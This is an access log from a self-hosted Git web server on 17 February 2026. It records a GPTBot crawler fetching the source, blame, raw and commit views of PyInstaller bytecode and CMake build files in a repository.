"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10938] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23974] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13350] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:14:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19490] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:14:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:14:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:14:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24010] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14331] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73535] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10938] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10895] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21830] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14322] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9900] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73527] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73560] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14291] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21787] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 